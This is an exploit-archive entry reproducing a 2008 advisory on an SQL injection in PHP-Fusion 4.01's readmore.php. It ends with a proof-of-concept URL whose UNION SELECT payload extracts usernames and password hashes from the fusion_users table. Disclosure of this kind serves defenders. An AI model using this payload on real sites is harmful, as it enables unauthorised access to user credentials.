PHP-Fusion 4.01 - 'readmore.php' SQL Injection



EKU-ID: 37167 CVE: CVE-2008-5946;OSVDB-51509 OSVDB-ID:
Author: Rake Published: 2008-08-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/30680/info

PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP-Fusion 4.01 is vulnerable; other versions may also be affected.

http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*